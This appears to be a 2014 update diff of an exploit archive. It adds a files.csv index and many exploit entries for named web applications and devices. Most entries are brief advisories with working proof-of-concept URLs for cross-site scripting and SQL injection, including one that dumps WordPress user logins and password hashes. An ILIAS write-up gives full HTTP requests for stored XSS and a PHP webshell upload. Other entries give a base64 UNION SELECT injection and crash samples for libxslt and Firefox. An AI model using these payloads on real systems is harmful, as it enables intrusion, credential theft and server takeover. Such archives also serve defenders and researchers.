Updated 02_24_2014

files.csv

@@ -28229,6 +28229,7 @@ id,file,description,date,author,platform,type,port
 31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
+31423,platforms/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps,0
 31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80
 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
@@ -28550,6 +28551,7 @@ id,file,description,date,author,platform,type,port
 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header Cross Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0
 31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80
 31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0
+31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
 31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 ""CATV5_AllApplications"" - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555
 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
 31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability",2014-02-19,"Dhruv Shah",hardware,webapps,80
@@ -28601,3 +28603,34 @@ id,file,description,date,author,platform,type,port
 31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0
 31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 'ayrinti.asp' Parameter SQL Injection Vulnerability",2008-05-20,U238,asp,webapps,0
 31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0
+31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0
+31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 File Processing Buffer Overflow Vulnerability",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
+31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability",2008-05-21,DSecRG,java,webapps,0
+31817,platforms/multiple/dos/31817.html,"Mozilla Firefox  2.0.0.14 JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0
+31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (1)",2008-05-21,"Martin Nagy",windows,dos,0
+31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (2)",2008-05-21,"Praveen Darshanam",windows,dos,0
+31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 Multiplexer Buffer Overflow Vulnerability",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0
+31821,platforms/php/webapps/31821.txt,"phpFreeForum 1.0 rc2 error.php message Parameter XSS",2008-05-22,tan_prathan,php,webapps,0
+31822,platforms/php/webapps/31822.txt,"phpFreeForum 1.0 rc2 part/menu.php Multiple Parameter XSS",2008-05-22,tan_prathan,php,webapps,0
+31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 cms/includes/header.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 cms/includes/login.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31825,platforms/php/webapps/31825.txt,"BMForum 5.6 index.php outpused Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31826,platforms/php/webapps/31826.txt,"BMForum 5.6 newtem/footer/bsd01footer.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31827,platforms/php/webapps/31827.txt,"BMForum 5.6 newtem/header/bsd01header.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall <= 3.5.11 'ldap_test.cgi' Cross-Site Scripting Vulnerability",2008-05-22,"Information Risk Management Plc",hardware,remote,0
+31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
+31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0
+31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability",2014-02-22,"Mohamed Shetta",windows,remote,30000
+31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80
+31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 (clicktracker.php, track param) - SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80
+31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0
+31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' SQL Injection Vulnerability",2008-05-24,eserg.ru,php,webapps,0
+31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 'fname' Parameter SQL Injection Vulnerability",2008-05-24,"Ali Jasbi",php,webapps,0
+31838,platforms/php/webapps/31838.txt,"Horde Multiple Product workweek.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31839,platforms/php/webapps/31839.txt,"Horde Multiple Product week.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31840,platforms/php/webapps/31840.txt,"Horde Multiple Product day.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0
+31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 'adv_cat.php' SQL Injection Vulnerability",2008-05-26,Jasbi,php,webapps,0
+31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0
+31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0

platforms/asp/webapps/31843.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29370/info
+
+Excuse Online is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+???+like+'%25
+http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25 

platforms/hardware/remote/31828.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29340/info
+
+Barracuda Spam Firewall is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Firmware prior to Barracuda Spam Firewall 3.5.11.025 is vulnerable. 
+
+https://www.example.com/cgi-bin/ldap_test.cgi?host=127.0.0.1&port=1&tl s_mode=tls_mode&tls_require=&username=&password=&filter=&searchbase=&uni que_attr=&email_attr=&domain=*&email=%3Cscript%3Ealert(document.cookie)% 3C/script%3E 

platforms/java/webapps/31816.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29317/info
+
+SAP Web Application Server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SAP Web Application Server 7.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sap/bc/gui/sap/its/webgui/aaaaaaa"><img/src=javascript:alert('DSECRG_XSS')> 

platforms/linux/dos/31815.html

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/29312/info
+
+The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
+
+An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
+
+This issue affects libxslt 1.1.23 and prior versions. 
+
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
+<xsl:output method="xml"/>
+
+<xsl:template
+match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
+<xsl:if test="contains(text(), 'published')">
+<found/>
+</xsl:if>
+</xsl:template>
+</xsl:stylesheet> 

platforms/multiple/dos/31817.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29318/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+This issue affects Firefox 2.0.0.14; other versions may also be vulnerable. 
+
+<script> // It might not work on your platform due to a ton of reasons. // tested on WinXP SP2 JRE version 1.6.0_01 function run() { var data = '<applet src="javascript:" id="x">'; y.document.open(); y.document.write(data); y.document.close(); } </script> <input name="button" value="Run" onclick="run()" type="button"> <iframe name="y" id="x" src="" frameborder="1" height="200"></iframe> 

platforms/php/webapps/31821.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29337/info
+
+phpFreeForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[phpfreeforum_path]/html/error.php?message=<XSS>

platforms/php/webapps/31822.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29337/info
+ 
+phpFreeForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/[phpfreeforum_path]/html/part/menu.php?nickname=<XSS>
+http://www.example.com/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS> 

platforms/php/webapps/31823.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29338/info
+
+phpSQLiteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+phpSQLiteCMS 1 RC2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=<XSS>
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=<XSS>
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=<XSS>

platforms/php/webapps/31824.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29338/info
+ 
+phpSQLiteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+phpSQLiteCMS 1 RC2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=<XSS>
+http://www.example.com/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=<XSS>
+

platforms/php/webapps/31825.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[BBForum_path]/index.php?outpused=<XSS>

platforms/php/webapps/31826.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29339/info
+ 
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+BMForum 5.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
+http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>

platforms/php/webapps/31827.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29339/info
+  
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+BMForum 5.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
+http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS> 

platforms/php/webapps/31829.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29342/info
+
+AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect AbleDating 2.4; other versions may also be vulnerable.
+
+
+http://www.example.com/search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search

platforms/php/webapps/31830.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29342/info
+ 
+AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+ 
+These issues affect AbleDating 2.4; other versions may also be vulnerable.
+ 
+http://www.example.com/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>&#039;><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on

platforms/php/webapps/31833.txt

@@ -0,0 +1,171 @@
+# ==============================================================
+# Title ...| Multiple vulnerabilities in ILIAS
+# Version .| ilias-4.4.1.zip
+# Date ....| 21.02.2014
+# Found ...| HauntIT Blog
+# Home ....| www.ilias.de
+# ==============================================================
+
+First from admin user logged in:
+
+# ==============================================================
+# 1. Persistent xss
+
+---<request>---
+
+POST /k/cms/ilias/ilias.php?wsp_id=2&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=
+ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 91
+
+title=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&cmd%5BcreatePosting%5D=Add+Posting
+---<request>---
+
+
+# ==============================================================
+# 2. Possibility of uploading webshell
+
+Uploaded file can be found in the ILIAS directories, for example:
+---<code>---
+k@lab:~/public_html/cms/ilias$ cat ./44444/ilFile/3/file_334/001/shell.php
+<?php system($_REQUEST['cmd']); ?>
+k@lab:~/public_html/cms/ilias$
+---<code>---
+
+Direct access to this file will give you a webshell.
+
+* 
+* This bug will be described later in section for 'normal/registered' user.
+* 
+
+
+# ==============================================================
+# 3. XSS
+
+---<request>---
+POST /k/cms/ilias/ilias.php?ref_id=1&new_type=webr&cmd=post&cmdClass=ilobjlinkresourcegui&
+cmdNode=nm:9y&baseClass=ilRepositoryGUI&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 760
+
+tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22tar_value
+%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0D%0A%09%3Ca+id%3D%
+22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%22ilias.php%3Fref_id%3D1%26n
+ew_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternallinkgui%26cmdNode%3Dnm%3A9y%3A3l%3A3z
+%3A3s%3Ai1%26baseClass%3DilRepositoryGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+
+Object%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar
+_rem%22%3E%0D%0A%09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remo
+ve%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des=
+asdasd&cmd%5Bsave%5D=Add+Weblink
+
+---<request>---
+
+---<response>---
+
+Target: <span class="asterisk">*</span><br />
+      
+<input type="text" name="links[4][tar]" value="'>"><body/onload=alert(9999)>" size="40" 
+maxlength="500" />
+      
+---<response>---
+
+
+
+
+# ==============================================================
+# 4. Another webshell upload possibility
+
+There is a possibility of creating webshell when php file is added as an attachement
+to email to user(s).
+
+
+All shells will be located in /ilias/ (wwwroot) directory with value from 'client_id'
+(for example: client_id=44444, then your shell is in /ilias/44444/...)
+
+
+
+# ==============================================================
+
+Second: from normal/registered user logged in:
+
+# ==============================================================
+# 1. When normal user is registered on the latest ILIAS, he is able to add
+PHP file contains simple shell. From this moment he will be able to hack 
+the whole server.
+
+---<request>---
+POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=file&cmd=post&cmdClass=
+ilobjfilegui&cmdNode=mw:my:jh&baseClass=ilPersonalDesktopGUI&fallbackC
+md=uploadFiles&rtoken=2e4e8af720b2204ea51503ca6388a325 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Cache-Control: no-cache
+
+-----------------------------1761332042190
+Content-Disposition: form-data; name="title"
+
+shell.php
+-----------------------------1761332042190
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------1761332042190
+Content-Disposition: form-data; name="extract"
+
+0
+-----------------------------1761332042190
+Content-Disposition: form-data; name="keep_structure"
+
+0
+-----------------------------1761332042190
+Content-Disposition: form-data; name="upload_files"; filename="shell.php"
+Content-Type: application/octet-stream
+
+<?php system($_REQUEST['cmd']); ?>
+-----------------------------1761332042190--
+
+---<request>---
+
+
+# ==============================================================
+# 2. XSS (same place like when admin is logged in)
+
+
+---<request>---
+POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=webr&cmd=post&cmdClass=ilobjlinkresource
+gui&cmdNode=mw:my:9y&baseClass=ilPersonalDesktopGUI&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 768
+
+tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22
+tar_value%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0
+D%0A%09%3Ca+id%3D%22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%2
+2ilias.php%3Fwsp_id%3D41%26new_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternal
+linkgui%26cmdNode%3Dmw%3Amy%3A9y%3A3l%3A3z%3A3s%3Ai1%26baseClass%3DilPersonalDeskt
+opGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+Object%3C%2Fa%3E%0D%0A%3C%
+2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar_rem%22%3E%0D%0A%
+09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remove%3C%2F
+a%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des
+=dsa&cmd%5Bsave%5D=Add+Weblink
+---<request>---
+ 
+
+
+# ==============================================================
+# 3. Persistent xss
+
+---<request>---
+POST /k/cms/ilias/ilias.php?wsp_id=111&bmn=2014-02&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 89
+
+title=%27%3E%22%3E%3Cbody%2Fonload%3Dalert%28123%29%3E&cmd%5BcreatePosting%5D=Add+Posting
+---<request>---
+
+
+# ==============================================================
+# More @ http://HauntIT.blogspot.com

platforms/php/webapps/31834.txt

@@ -0,0 +1,60 @@
+Advisory ID: HTB23201
+Product: AdRotate
+Vendor: AJdG Solutions
+Vulnerable Version(s): 3.9.4 and probably prior
+Tested Version: 3.9.4
+Advisory Publication:  January 30, 2014  [without technical details]
+Vendor Notification: January 30, 2014 
+Vendor Patch: January 31, 2014 
+Public Disclosure: February 20, 2014 
+Vulnerability Type: SQL Injection [CWE-89]
+CVE Reference: CVE-2014-1854
+Risk Level: High 
+CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.
+
+
+1) SQL Injection in AdRotate: CVE-2014-1854
+
+The vulnerability exists due to insufficient validation of "track" HTTP GET parameter passed to
+ "/wp-content/plugins/adrotate/library/clicktracker.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
+
+The following PoC code contains a base64-encoded string "-1 UNION SELECT version(),1,1,1", which will be injected into SQL query and will output MySQL server version:
+
+http://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==
+
+Successful exploitation will result in redirection to local URI that contains version of the MySQL server:
+http://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to AdRotate 3.9.5
+
+More Information:
+http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/
+http://wordpress.org/plugins/adrotate/changelog/
+http://www.adrotateplugin.com/development/
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate.
+[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/php/webapps/31835.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29343/info
+
+SAFARI Montage is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SAFARI Montage 3.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/SAFARI/montage/forgotPW.php?school="><script>alert(1)</script> http://www.example.com/SAFARI/montage/forgotPW.php?email="><iframe src="http://www.example2.com"> 

platforms/php/webapps/31836.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29352/info
+
+The Upload File plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-uploadfile.php?f_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* 

platforms/php/webapps/31837.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29353/info
+
+DZOIC Handshakes is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DZOIC Handshakes 3.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/dzoic/index.php?handler=search&action=perform&search_type=members&fname=[Sql Injection]&lname=jakson&email=1@www.example2.com&handshakes=0&distance=0&country=0&state=0&city=0&postal_code=12345&online=on&with_photo=on&submit=Search 

platforms/php/webapps/31838.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29365/info
+
+Horde Kronolith is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Specific vulnerable versions have not been provided. We will update this BID as more information emerges. 
+
+http://www.example.com/horde/kronolith/workweek.php?timestamp=<XSS> 

platforms/php/webapps/31839.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29365/info
+ 
+Horde Kronolith is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Specific vulnerable versions have not been provided. We will update this BID as more information emerges.
+
+http://www.example.com/horde/kronolith/week.php?timestamp=<XSS> 

platforms/php/webapps/31840.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29365/info
+  
+Horde Kronolith is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+Specific vulnerable versions have not been provided. We will update this BID as more information emerges.
+
+http://www.example.com/horde/kronolith/day.php?timestamp=<XSS> 

platforms/php/webapps/31841.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29368/info
+
+miniCWB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+miniCWB 2.1.1 is vulnerable; other versions may also be affected. 
+
